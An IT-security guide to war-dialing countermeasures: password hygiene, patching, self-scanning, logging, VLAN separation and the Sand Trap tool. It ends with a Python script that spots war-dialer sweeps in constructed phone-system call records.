It’s not enough to just know of war dialing. IT security professionals need to know how to safeguard and protect against war dialing attacks. Luckily, there are a lot of war dialing countermeasures you can implement to prevent against this sort of attack.

Let’s start with the basic prevention methods:

1. Change all default passwords for any VOIP, PBX, voice mail, backup modem, or fax machines you may have connected to your network. This step is crucial, and it should be the first one that you take when securing VOIP and other telephone systems. Most modems and VOIP systems have default passwords already set. Make sure you change them, and make sure they are long and difficult to guess. Ask yourself, would my password appear in a hacker’s dictionary file? Would it be simple enough to guess or brute force? If so, change the password to something more difficult.

2. Check for updates and apply security patches as soon as possible. Make a list of all your VOIP, modem, fax, and other telephony hardware. Check the manufacturers’ websites for updates, and you’re on your way to a more secure network.

3. Conduct a manual reconnaissance of your network. You should regularly scan your own network for modems and telephone systems. Perform war dialing against your own external telephone numbers, anything that could potentially dial into your own network. Be proactive! Make a baseline of every device you find and keep track of it. Often, employees will bring in their own modems and connect them to the company network so they can bypass web filtering. Watch for this!

4. Log all successful and failed login attempts. Modern modems and VOIP systems should allow you to monitor logins. Make sure you enable this feature and store the logs on a central log management system with something like Kiwi or Splunk.

5. Use VLANs to segment voice and data. You’ll need managed switches and a firewall that can route and filter between the VLANs, but it’s one of the most effective ways to contain a war dialing intrusion. Using VLANs, you logically separate your voice traffic from your data traffic while both still run over the same cables and hardware. With proper VLAN separation and firewall rules between the VLANs, even if an attacker dials into your phone system, the phone system itself cannot reach your data nodes (such as servers and desktops). Be clear about what this does and does not do: it limits where an intruder can go after getting in; it does not stop the dial-in itself, so combine it with steps 1 through 4.

6. Lastly, you can take a look at the Sand Trap tool. Sand Trap can be configured to monitor for any war dial attempts and even answer those dials. Sand Trap can log the caller ID and provide a login banner and password prompt for the dialer. This is an awesome tool that can act as a barrier between a war dialer and a telephone or modem system. However, it won’t work with every telephone device out there, so check it out before committing to it.
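Steps 3, 4 and 6 all leave you with call logs, so here is what to do with them: a detector, added for this page and not taken from Sand Trap, TeleSweep or any vendor’s log format, that reads call-detail records from a PBX or VOIP gateway and flags a caller sweeping many numbers with short calls, the signature of a war dialer hunting for something that answers. The CSV layout, the phone numbers and all the records are constructed; a real deployment would feed it the CDR export of whatever phone system you run.

```python
"""Spotting a war dialer in call-detail records (CDRs) from a PBX or VoIP gateway.
Added example: the detector and the sample records below are constructed for this
page, not taken from Sand Trap, TeleSweep or any vendor's log format."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def parse_cdr(text):
    """CSV lines: ISO-8601 UTC timestamp, calling number, called number, seconds."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("timestamp"):
            continue
        ts, caller, called, dur = line.split(",")
        records.append({"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        "caller": caller, "called": called, "duration": float(dur)})
    return records


def longest_sequential_run(numbers):
    """Length of the longest run of consecutive dialled numbers (a THC Scan-style sweep)."""
    digits = sorted({int(re.sub(r"\D", "", n)) for n in numbers})
    best = run = 1 if digits else 0
    for prev, cur in zip(digits, digits[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def detect_war_dialing(records, min_targets=8, window=timedelta(minutes=10), max_avg_duration=15.0):
    """Alert on a caller that reaches many distinct numbers in a short window with
    short calls: a sweep looking for a modem or IVR that answers, not a conversation."""
    by_caller = defaultdict(list)
    for rec in records:
        by_caller[rec["caller"]].append(rec)
    alerts = []
    for caller, calls in by_caller.items():
        calls.sort(key=lambda r: r["time"])
        in_window, start, best = Counter(), 0, (0, 0, 0)   # sliding window of distinct targets
        for end, rec in enumerate(calls):
            in_window[rec["called"]] += 1
            while rec["time"] - calls[start]["time"] > window:
                old = calls[start]["called"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) > best[0]:
                best = (len(in_window), start, end)
        distinct, s, e = best
        if distinct < min_targets:
            continue
        span = calls[s:e + 1]
        avg = sum(c["duration"] for c in span) / len(span)
        if avg > max_avg_duration:
            continue      # many calls but long ones: a call-centre agent, not a scanner
        alerts.append({"caller": caller, "targets": distinct,
                       "sequential_run": longest_sequential_run(c["called"] for c in span),
                       "avg_duration": round(avg, 1)})
    return alerts


def make_sample_cdr():
    """Constructed records: a sequential sweep, a call-centre agent and a receptionist."""
    t0 = datetime(2024, 3, 4, 2, 13, 5)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = ["timestamp,caller,called,duration"]
    for i in range(12):   # war dialer: +15558800100 .. +15558800111, 10 s apart, short calls
        lines.append(f"{(t0 + timedelta(seconds=10 * i)).strftime(fmt)},"
                     f"+15550001234,+1555880{100 + i:04d},{2 + i % 4}")
    for i in range(9):    # agent: nine different customers, a minute apart, long calls
        lines.append(f"{(t0 + timedelta(minutes=i)).strftime(fmt)},"
                     f"+15550002000,+1555{7000 + 37 * i:07d},{90 + 20 * i}")
    for i, (num, dur) in enumerate([("+15550003001", 120), ("+15550003002", 45),
                                    ("+15550004444", 300)]):   # receptionist
        lines.append(f"{(t0 + timedelta(minutes=i)).strftime(fmt)},+15550009999,{num},{dur}")
    return "\n".join(lines)


if __name__ == "__main__":
    for alert in detect_war_dialing(parse_cdr(make_sample_cdr())):
        print(alert)
```

Both thresholds matter. The distinct-target count alone would also flag the agent working through a customer list, which is why average call duration is the second test; the sequential_run field is what turns a suspicion into an obvious sweep, since nobody legitimately dials twelve consecutive numbers in two minutes at two in the morning. Run it over the logs from step 4, and the caller IDs Sand Trap records, and tune min_targets and window to your own call volumes.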